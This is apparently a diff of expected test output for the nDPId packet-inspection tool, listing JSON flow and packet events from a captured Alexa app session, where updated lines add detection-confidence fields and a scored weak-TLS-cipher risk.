-00652{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
-00651{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
-00653{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00652{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00654{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00675{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":180000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
+00677{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
+00679{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976118107,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00680{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976130073,"flow_last_seen":1490976130073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1490976130073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976130073,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8j51AAEAGf0qsECrYNu8d\/Z+gAbt6Gf6DAAAAAKAC\/\/+QHQAAAgQFtAQCCAoA9nEeAAAAAAEDAwg="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1490976130307,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976130307,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww\/RAAOcGo\/427x39rBAq2AG7n6DOZIqUehn+hHASH\/7FQwAAAgQFtAEDAwY="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1490976130308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976130308,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoj55AAEAGf12sECrYNu8d\/Z+gAbt6Gf6EzmSKlVAQAVcPtQAA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1490976133936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1490976133936,"pkt":"AMDKkaPvePiC0\/vCCABFAABDWl9AAEARM1GsECrYrBAqARM4ADUALyGouR4BAAABAAAAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQAB"}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1490976134135,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"ts_msec":1490976134135,"pkt":"ePiC0\/vCAMDKkaPvCABFAADu5XxAAEARp4isECoBrBAq2AA1EzgA2tC0uR6BgAABAAkAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQABwAwABQABAAAAMQAfDmQxZ2Uwa2sxbDVrbXMwCmNsb3VkZnJvbnQDbmV0AMAzAAEAAQAAADsABDRUPzjAMwABAAEAAAA7AAQ0VD8QwDMAAQABAAAAOwAENFQ\/PcAzAAEAAQAAADsABDRUPxrAMwABAAEAAAA7AAQ0VD\/swDMAAQABAAAAOwAENFQ\/I8AzAAEAAQAAADsABDRUP9\/AMwABAAEAAAA7AAQ0VD\/n"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1490976134135,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.63.56"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"ts_msec":1490976134135,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.63.56"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134140,"flow_last_seen":1490976134140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976134140,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1490976134140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976134140,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82ItAAEAGF7ysECrYNFQ\/OMsRAFDDaqo+AAAAAKAC\/\/9Q1AAAAgQFtAQCCAoA9nK1AAAAAAEDAwg="}
